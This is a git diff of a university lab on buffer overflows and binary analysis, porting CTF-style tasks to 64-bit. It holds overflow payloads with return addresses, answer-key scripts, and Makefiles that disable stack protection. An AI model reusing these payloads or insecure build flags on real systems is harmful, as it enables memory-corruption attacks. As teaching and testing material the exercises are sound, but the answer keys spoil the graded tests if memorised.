diff --git a/labs/lab-12/media/rop-anatomy.svg b/labs/lab-12/media/rop-anatomy.svg
index 746ce0484..7512b0268 100644
--- a/labs/lab-12/media/rop-anatomy.svg
+++ b/labs/lab-12/media/rop-anatomy.svg
@@ -1,4 +1,4 @@
-
-
-
+
+
+
\ No newline at end of file
diff --git a/labs/lab-12/tasks/feeling-chained/solution/Makefile b/labs/lab-12/tasks/feeling-chained/solution/Makefile
index a83f61ab1..93f3ab7f7 100644
--- a/labs/lab-12/tasks/feeling-chained/solution/Makefile
+++ b/labs/lab-12/tasks/feeling-chained/solution/Makefile
@@ -1,6 +1,6 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = buff-ovf3
OBJ = buff-ovf3.o
@@ -8,10 +8,10 @@ OBJ = buff-ovf3.o
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
$(TARGET): $(OBJ)
$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)
diff --git a/labs/lab-12/tasks/feeling-chained/solution/exploit.sh b/labs/lab-12/tasks/feeling-chained/solution/exploit.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/feeling-chained/solution/solve.sh b/labs/lab-12/tasks/feeling-chained/solution/solve.sh
index 0538bba2a..b57f15d44 100755
--- a/labs/lab-12/tasks/feeling-chained/solution/solve.sh
+++ b/labs/lab-12/tasks/feeling-chained/solution/solve.sh
@@ -1,7 +1,10 @@
#!/bin/bash
# SPDX-License-Identifier: BSD-3-Clause
-python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\x56\x93\x04\x08"
+python3 -c 'import sys; sys.stdout.buffer.write(b"A"*18 + b"\x96\x11\x40\x00"
+ b"\x00\x93\x04\x08"
+ b"\x38\x00\x00\x00"
+ b"\x0d\x00\x00\x00")' | ../support/buff-ovf3
+
+
+run < <(python3 -c 'import sys; sys.stdout.buffer.write(b"\x00"*18 + b"\x3c\x13\x40\x00\x00\x00\x00\x00" + b"\x00"*2000)')
\ No newline at end of file
diff --git a/labs/lab-12/tasks/feeling-chained/support/buff-ovf3 b/labs/lab-12/tasks/feeling-chained/support/buff-ovf3
index cad0d8c48..01782392f 100755
Binary files a/labs/lab-12/tasks/feeling-chained/support/buff-ovf3 and b/labs/lab-12/tasks/feeling-chained/support/buff-ovf3 differ
diff --git a/labs/lab-12/tasks/feeling-chained/support/exploit.sh b/labs/lab-12/tasks/feeling-chained/support/exploit.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/feeling-chained/tests/graded_test.inc.sh b/labs/lab-12/tasks/feeling-chained/tests/graded_test.inc.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/feeling-chained/tests/run_all_tests.sh b/labs/lab-12/tasks/feeling-chained/tests/run_all_tests.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/feeling-chained/tests/tests.sh b/labs/lab-12/tasks/feeling-chained/tests/tests.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/Makefile b/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/Makefile
index 684cc8d6e..6d7dcfcbc 100644
--- a/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/Makefile
+++ b/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/Makefile
@@ -1,16 +1,16 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = main
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
link: $(SRC_DIR)/link.c
$(CC) $(CFLAGS) -c -o $@ $<
diff --git a/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/README.md b/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/README.md
index 188977ed1..8b79d98ac 100644
--- a/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/README.md
+++ b/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/README.md
@@ -10,7 +10,17 @@ This is a clear indicator that we have to find a way to call it ourselves.
We define a `get_flag()` function prototype as void (you may be able to skip this step, but there will be an implicit declaration error during compilation) and we call it in our main function.
We then compile and assemble the file:
-`gcc -g -m32 -fno-PIC -c main.c`
+`gcc -g -m64 -fno-PIC -c main.c`
+
+This command compiles `main.c` into an object file `main.o` without position-independent code (PIC): -fno-PIC.
+The `-g` flag is used to include debugging information, and `-m64` specifies that we are compiling for a 64-bit architecture.
+The `-c` flag tells the compiler to compile the source file into an object file without linking it.
We then link it to the `link` binary:
-`gcc -no-pie -m32 link main.o -o a.out`
+`gcc -no-pie -m64 link main.o -o a.out`
+
+This command links the `link` binary with our object file `main.o` to create an executable named `a.out`.
+The `-no-pie` flag is used to disable position-independent executables, and `-m64` specifies that we are linking for a 64-bit architecture.
+
+Finally, we run the executable:
+`./a.out`
diff --git a/labs/lab-12/tasks/hidden-in-plain-sight-1/support/link b/labs/lab-12/tasks/hidden-in-plain-sight-1/support/link
index c0b67f507..12937cf89 100755
Binary files a/labs/lab-12/tasks/hidden-in-plain-sight-1/support/link and b/labs/lab-12/tasks/hidden-in-plain-sight-1/support/link differ
diff --git a/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/Makefile b/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/Makefile
index 57211dc1a..44d616045 100644
--- a/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/Makefile
+++ b/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/Makefile
@@ -1,16 +1,16 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = main
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
link2: $(SRC_DIR)/link.c
$(CC) $(CFLAGS) -c -o $@ $<
diff --git a/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/README.md b/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/README.md
index 0a00ccb16..873638fd6 100644
--- a/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/README.md
+++ b/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/README.md
@@ -10,26 +10,17 @@ In a nature similar to that of the previous exercise, we take a close look at th
```asm
0000012b :
(...)
-137: 83 7d 08 2a cmp dword ptr [ebp + 8], 42
-13b: 75 0d jne 0x14a
-13d: 80 7d f4 58 cmp byte ptr [ebp - 12], 88
-141: 75 07 jne 0x14a
-143: e8 b8 fe ff ff call 0x0
+149: 83 7d fc 2a cmp DWORD PTR [rbp-0x4],0x2a
+14d: 75 0d jne 15c
+14f: 80 7d f8 58 cmp BYTE PTR [rbp-0x8],0x58
+153: 75 07 jne 15c
+155: e8 a6 fe ff ff call 0
```
-The first `cmp` instruction at `0x137` compares the value at `[ebp + 8]` with `42`.
-This implies that the first argument passed to the helper() function is expected to be `42`.
-The second `cmp` instruction at `0x13d` compares the value at `[ebp - 12]` with `88`.
-Since it's comparing a single byte (`byte ptr`), we can infer that this corresponds to a `char` argument.
-Although it appears to be a local variable, if we look around a bit, we will notice why that is:
-
-```asm
-131: 8b 45 0c mov eax, dword ptr [ebp + 12]
-134: 88 45 f4 mov byte ptr [ebp - 12], al
-```
-
-The value at `[ebp + 12]` is moved into the `eax` register - this corresponds to the second argument passed to the `helper` function.
-The lower byte of `eax`, `al`, the `char` that we are interested in, is then moved into a local variable.
+The first 'cmp' instruction at '0x149' compares the value at '[rbp - 0x4]' with '0x2a'.
+This implies that the first argument passed to the helper() function is expected to be '0x2a'.
+The second 'cmp' instruction at '0x14f' compares the value at '[rbp - 0x8]' with '0x58'.
+Since it's comparing a single byte ('byte ptr'), we can infer that this corresponds to a 'char' argument.
If both of the aforementioned comparisons are successful, the `get_flag()` function is called.
Hence, we can infer that we need to call the `helper()` function using the two arguments above - the integer `44`, and the char `X`, which is `88` in decimal.
diff --git a/labs/lab-12/tasks/hidden-in-plain-sight-2/support/link2 b/labs/lab-12/tasks/hidden-in-plain-sight-2/support/link2
index 519474896..8cd6a1229 100755
Binary files a/labs/lab-12/tasks/hidden-in-plain-sight-2/support/link2 and b/labs/lab-12/tasks/hidden-in-plain-sight-2/support/link2 differ
diff --git a/labs/lab-12/tasks/indirect-business/README.md b/labs/lab-12/tasks/indirect-business/README.md
index d412c0513..2069f8e8e 100644
--- a/labs/lab-12/tasks/indirect-business/README.md
+++ b/labs/lab-12/tasks/indirect-business/README.md
@@ -12,19 +12,3 @@ Use the input to alter the data in your favor.
If you experience a neural buffer overflow, take a look at the [relevant lab](https://cs-pub-ro.github.io/hardware-software-interface/Lab%2011%20-%20Buffer%20Management.%20Buffer%20Overflow/) and at [online examples](https://medium.com/@0x-Singularity/exploit-tutorial-understanding-buffer-overflows-d017108edc85).
If that still doesn't work, keep in mind that the great cybersecurity expert named Sun Tzu was a big proponent of bruteforce attacks.
-
-## Checker
-
-To test the implementation, enter the `tests/` directory and run:
-
-```console
-make check
-```
-
-In case of a correct solution, you will get an output such as:
-
-```text
-test_payload ........................ passed ... 100
-
-Total: 100/100
-```
diff --git a/labs/lab-12/tasks/indirect-business/solution/Makefile b/labs/lab-12/tasks/indirect-business/solution/Makefile
index 5a06169a6..6da647f54 100644
--- a/labs/lab-12/tasks/indirect-business/solution/Makefile
+++ b/labs/lab-12/tasks/indirect-business/solution/Makefile
@@ -1,6 +1,6 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = buff-ovf
OBJ = buff-ovf.o
@@ -8,10 +8,10 @@ OBJ = buff-ovf.o
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
$(TARGET): $(OBJ)
$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)
diff --git a/labs/lab-12/tasks/indirect-business/solution/README.md b/labs/lab-12/tasks/indirect-business/solution/README.md
index 5bdfca3e9..eb5c3485e 100644
--- a/labs/lab-12/tasks/indirect-business/solution/README.md
+++ b/labs/lab-12/tasks/indirect-business/solution/README.md
@@ -8,6 +8,16 @@ parent: 'Task: Indirect Business'
Use the buffer overflow to overwrite a string on the stack.
This is going to be copied to a global variable that is checked before calling the `get_flag()` function.
+Check the code from ./buff-ovf with GDB:
+```
+ char local_buff[10];
+ char message[10];
+
+ fgets(message, 20, stdin);
+ strcpy(buff, local_buff);
+```
+By analysing the code we can see that string "message" is 10 bytes long, but we are reading 20 bytes from stdin. By overflowing the buffer we can overwrite the "local_buff" variable with a string.
+
```sh
python3 -c 'import sys; sys.stdout.buffer.write(b"A"*10 + b"Bye")' | ./buff-ovf
```
diff --git a/labs/lab-12/tasks/indirect-business/solution/exploit.sh b/labs/lab-12/tasks/indirect-business/solution/exploit.sh
deleted file mode 100755
index 61019235f..000000000
--- a/labs/lab-12/tasks/indirect-business/solution/exploit.sh
+++ /dev/null
@@ -1,11 +0,0 @@
-#!/bin/bash
-# SPDX-License-Identifier: BSD-3-Clause
-
-
-# TODO set the right string
-
-payload="AAAAAAAAAABye"
-
-# Print payload for redirect
-
-echo -ne "$payload"
diff --git a/labs/lab-12/tasks/indirect-business/solution/solve.sh b/labs/lab-12/tasks/indirect-business/solution/solve.sh
index 9567020aa..e81642d69 100755
--- a/labs/lab-12/tasks/indirect-business/solution/solve.sh
+++ b/labs/lab-12/tasks/indirect-business/solution/solve.sh
@@ -1,3 +1,2 @@
#!/bin/bash
-
python3 -c 'import sys; sys.stdout.buffer.write(b"A"*10 + b"Bye")' | ./buff-ovf
diff --git a/labs/lab-12/tasks/indirect-business/support/buff-ovf b/labs/lab-12/tasks/indirect-business/support/buff-ovf
index 7f37ef92a..cc94ca7b4 100755
Binary files a/labs/lab-12/tasks/indirect-business/support/buff-ovf and b/labs/lab-12/tasks/indirect-business/support/buff-ovf differ
diff --git a/labs/lab-12/tasks/indirect-business/support/exploit.sh b/labs/lab-12/tasks/indirect-business/support/exploit.sh
deleted file mode 100755
index 74c5b76d2..000000000
--- a/labs/lab-12/tasks/indirect-business/support/exploit.sh
+++ /dev/null
@@ -1,11 +0,0 @@
-#!/bin/bash
-# SPDX-License-Identifier: BSD-3-Clause
-
-
-# TODO set the right string
-
-payload=""
-
-# Print payload for redirect
-
-echo -ne "$payload"
diff --git a/labs/lab-12/tasks/indirect-business/tests/Makefile b/labs/lab-12/tasks/indirect-business/tests/Makefile
deleted file mode 100644
index c5bd8770c..000000000
--- a/labs/lab-12/tasks/indirect-business/tests/Makefile
+++ /dev/null
@@ -1,7 +0,0 @@
-SRC_PATH ?= ../support
-FULL_SRC_PATH = $(realpath $(SRC_PATH))
-
-.PHONY: check
-
-check:
- SRC_PATH=$(FULL_SRC_PATH) bash -c ./run_all_tests.sh
diff --git a/labs/lab-12/tasks/indirect-business/tests/graded_test.inc.sh b/labs/lab-12/tasks/indirect-business/tests/graded_test.inc.sh
deleted file mode 100755
index 165a40715..000000000
--- a/labs/lab-12/tasks/indirect-business/tests/graded_test.inc.sh
+++ /dev/null
@@ -1,42 +0,0 @@
-#!/bin/bash
-# SPDX-License-Identifier: BSD-3-Clause
-
-#
-# Print test result. Printed message should fit in 72 characters.
-#
-# Print format is:
-#
-# description ...................... passed ... NNN
-# description ...................... failed ... NNN
-# 32 chars 24 chars 6 3 3
-#
-
-print_test()
-{
- func="$1"
- result="$2"
- points="$3"
-
- if test "$points" -gt 999; then
- points=999
- fi
-
- printf "%-32s " "${func:0:31}"
- printf "........................"
- if test "$result" -eq 0; then
- printf " passed ... %3d\n" "$points"
- else
- printf " failed ... 0\n"
- fi
-}
-
-run_test()
-{
- func="$1"
- points="$2"
- # Run in subshell.
- (eval "$func")
- out=$?
- print_test "$func" "$out" "$points"
- return $out
-}
diff --git a/labs/lab-12/tasks/indirect-business/tests/run_all_tests.sh b/labs/lab-12/tasks/indirect-business/tests/run_all_tests.sh
deleted file mode 100755
index c8380cd95..000000000
--- a/labs/lab-12/tasks/indirect-business/tests/run_all_tests.sh
+++ /dev/null
@@ -1,21 +0,0 @@
-#!/bin/bash
-# SPDX-License-Identifier: BSD-3-Clause
-
-if test -z "$SRC_PATH"; then
- SRC_PATH=../support/
-fi
-
-export SRC_PATH
-echo ""
-(
- bash tests.sh
-) | tee results.txt
-echo ""
-echo "========================================================================"
-total=$(grep '\( passed \| failed \)' results.txt | rev | cut -d ' ' -f 1 | rev | paste -s -d'+' | bc)
-echo ""
-echo -n "Total: "
-echo -n " "
-LC_ALL=C printf "%3d/100\n" "$total"
-
-rm results.txt
diff --git a/labs/lab-12/tasks/indirect-business/tests/tests.sh b/labs/lab-12/tasks/indirect-business/tests/tests.sh
deleted file mode 100755
index 375e492fc..000000000
--- a/labs/lab-12/tasks/indirect-business/tests/tests.sh
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/bin/bash
-# SPDX-License-Identifier: BSD-3-Clause
-
-# shellcheck disable=SC1091
-source ./graded_test.inc.sh
-
-if test -z "$SRC_PATH"; then
- SRC_PATH=../support
-fi
-
-EXPLOIT="$SRC_PATH/exploit.sh"
-BINARY="$SRC_PATH/buff-ovf"
-
-test_payload()
-{
- flag="HSI_{well_well_well,...}"
-
- output=$($EXPLOIT | $BINARY | grep "HSI")
-
- echo
-
- if [[ "$output" == "$flag" ]]; then
- res=0
- else
- res=1
- fi
-
- return $res
-}
-
-run_test test_payload 100
diff --git a/labs/lab-12/tasks/look-at-him-go/README.md b/labs/lab-12/tasks/look-at-him-go/README.md
index 0a15f9af2..d85ef8047 100644
--- a/labs/lab-12/tasks/look-at-him-go/README.md
+++ b/labs/lab-12/tasks/look-at-him-go/README.md
@@ -10,4 +10,4 @@ The `look-at-him-go/support/dynamic` binary is executable this time and its sole
No tricks here.
> **TIP:** GDB is your friend.
-If you're unable to progress in this exercise, reference [the GDB lab](https://cs-pub-ro.github.io/hardware-software-interface/Lab%202%20-%20Memory%20Operations.%20Introduction%20to%20GDB/Introduction%20to%20GDB/Reading/) and [this](https://stackoverflow.com/questions/5429137/how-to-print-register-values-in-gdb).
+If you're unable to progress in this exercise, reference [the GDB lab](https://cs-pub-ro.github.io/hardware-software-interface/labs/lab-02/reading/introduction-to-GDB.html) and [this](https://stackoverflow.com/questions/13282176/using-gdb-to-check-registers-values/13282633).
diff --git a/labs/lab-12/tasks/look-at-him-go/solution/.gdb_history b/labs/lab-12/tasks/look-at-him-go/solution/.gdb_history
new file mode 100644
index 000000000..929a28dc2
--- /dev/null
+++ b/labs/lab-12/tasks/look-at-him-go/solution/.gdb_history
@@ -0,0 +1,9 @@
+lay n
+b main
+run
+n
+lay n
+tui disable
+run
+n
+q
diff --git a/labs/lab-12/tasks/look-at-him-go/solution/Makefile b/labs/lab-12/tasks/look-at-him-go/solution/Makefile
index 0cbf47ab9..204e661f3 100644
--- a/labs/lab-12/tasks/look-at-him-go/solution/Makefile
+++ b/labs/lab-12/tasks/look-at-him-go/solution/Makefile
@@ -1,6 +1,6 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = dynamic
OBJ = dynamic.o
@@ -8,10 +8,10 @@ OBJ = dynamic.o
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
$(TARGET): $(OBJ)
$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)
diff --git a/labs/lab-12/tasks/look-at-him-go/solution/README.md b/labs/lab-12/tasks/look-at-him-go/solution/README.md
index 2fedd6691..802296b30 100644
--- a/labs/lab-12/tasks/look-at-him-go/solution/README.md
+++ b/labs/lab-12/tasks/look-at-him-go/solution/README.md
@@ -8,17 +8,15 @@ parent: 'Task: Hook at Him Go'
Run the executable with GDB, ideally with `gef`, `pwndbg`, or `peda`.
As you step through, you will notice that the flag will appear in fragments in the display of the register contents (the flag string contains null characters placed specifically so that it would not be displayed all at once).
-```asm
-$eax : 0x0804d625 → "_out,"
-$ebx : 0x0804d22e → "_out,"
-$ecx : 0x0804d62a → 0x00000000
-$edx : 0x0804d625 → "_out,"
-```
+You may also see fragments in the memory dump, at times.
-You may also see fragments in the memory dump, at times:
+To step through the code, you can use the following commands:
-```asm
-0xffffd4b8│+0x0008: 0xf7fb9000 → 0x001ead6c
-0xffffd4bc│+0x000c: 0x0804d600 → 0x00000000
-0xffffd4c0│+0x0010: 0x0804d210 → 0x00495348 ("HSI"?)
+```gdb
+ni # Step to the next instruction
+n # Step to the next line of code
+b *0x or or # Set a breakpoint at a specific address
+c # Continue execution until the next breakpoint
```
+
+Observe the registers and memory as you step through the code, and you will see the flag being constructed in parts.
diff --git a/labs/lab-12/tasks/look-at-him-go/support/dynamic b/labs/lab-12/tasks/look-at-him-go/support/dynamic
index f36e23a0c..cf6827ad2 100755
Binary files a/labs/lab-12/tasks/look-at-him-go/support/dynamic and b/labs/lab-12/tasks/look-at-him-go/support/dynamic differ
diff --git a/labs/lab-12/tasks/playing-god/solution/Makefile b/labs/lab-12/tasks/playing-god/solution/Makefile
index 2d39ad34a..732cf6854 100644
--- a/labs/lab-12/tasks/playing-god/solution/Makefile
+++ b/labs/lab-12/tasks/playing-god/solution/Makefile
@@ -1,6 +1,6 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = dynamic2
OBJ = vuln.o
@@ -8,10 +8,10 @@ OBJ = vuln.o
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
$(TARGET): $(OBJ)
$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)
diff --git a/labs/lab-12/tasks/playing-god/solution/dynamic2 b/labs/lab-12/tasks/playing-god/solution/dynamic2
new file mode 100644
index 000000000..c53f08112
Binary files /dev/null and b/labs/lab-12/tasks/playing-god/solution/dynamic2 differ
diff --git a/labs/lab-12/tasks/playing-god/support/dynamic2 b/labs/lab-12/tasks/playing-god/support/dynamic2
index c727249aa..c53f08112 100755
Binary files a/labs/lab-12/tasks/playing-god/support/dynamic2 and b/labs/lab-12/tasks/playing-god/support/dynamic2 differ
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/solution/Makefile b/labs/lab-12/tasks/rip-my-buffers-off/solution/Makefile
index ce9f68c0d..9484d5d56 100644
--- a/labs/lab-12/tasks/rip-my-buffers-off/solution/Makefile
+++ b/labs/lab-12/tasks/rip-my-buffers-off/solution/Makefile
@@ -1,6 +1,6 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = buff-ovf2
OBJ = buff-ovf2.o
@@ -8,10 +8,10 @@ OBJ = buff-ovf2.o
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
$(TARGET): $(OBJ)
$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/solution/exploit.sh b/labs/lab-12/tasks/rip-my-buffers-off/solution/exploit.sh
old mode 100755
new mode 100644
index fb26faf4c..5afa5b509
--- a/labs/lab-12/tasks/rip-my-buffers-off/solution/exploit.sh
+++ b/labs/lab-12/tasks/rip-my-buffers-off/solution/exploit.sh
@@ -3,8 +3,9 @@
# TODO set the correct padding length and values of addresses and stack variables
-padding_length="41"
-address="\xd6\x91\x04\x08"
+padding_length="56"
+# 64-bit little-endian address of win() (0x4011f6)
+address="\xf6\x11\x40\x00\x00\x00\x00\x00"
# build the payload
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/solution/solve.sh b/labs/lab-12/tasks/rip-my-buffers-off/solution/solve.sh
index 9aa0bef95..95daf9b81 100755
--- a/labs/lab-12/tasks/rip-my-buffers-off/solution/solve.sh
+++ b/labs/lab-12/tasks/rip-my-buffers-off/solution/solve.sh
@@ -1,3 +1,3 @@
#!/bin/bash
-python3 -c 'import sys; sys.stdout.buffer.write(b"A"*41 + b"\xd6\x91\x04\x08")' | ../support/buff-ovf2
+python3 -c 'import sys; sys.stdout.buffer.write(b"A"*56 + b"\xf6\x11\x40\x00\x00\x00\x00\x00")' | ../support/buff-ovf2
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/support/buff-ovf2 b/labs/lab-12/tasks/rip-my-buffers-off/support/buff-ovf2
index eb708ec0e..de3899633 100755
Binary files a/labs/lab-12/tasks/rip-my-buffers-off/support/buff-ovf2 and b/labs/lab-12/tasks/rip-my-buffers-off/support/buff-ovf2 differ
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/support/exploit.sh b/labs/lab-12/tasks/rip-my-buffers-off/support/exploit.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/tests/graded_test.inc.sh b/labs/lab-12/tasks/rip-my-buffers-off/tests/graded_test.inc.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/tests/run_all_tests.sh b/labs/lab-12/tasks/rip-my-buffers-off/tests/run_all_tests.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/tests/tests.sh b/labs/lab-12/tasks/rip-my-buffers-off/tests/tests.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rop/solution/exploit.sh b/labs/lab-12/tasks/rop/solution/exploit.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rop/support/exploit.sh b/labs/lab-12/tasks/rop/support/exploit.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rop/tests/graded_test.inc.sh b/labs/lab-12/tasks/rop/tests/graded_test.inc.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rop/tests/run_all_tests.sh b/labs/lab-12/tasks/rop/tests/run_all_tests.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rop/tests/tests.sh b/labs/lab-12/tasks/rop/tests/tests.sh
old mode 100755
new mode 100644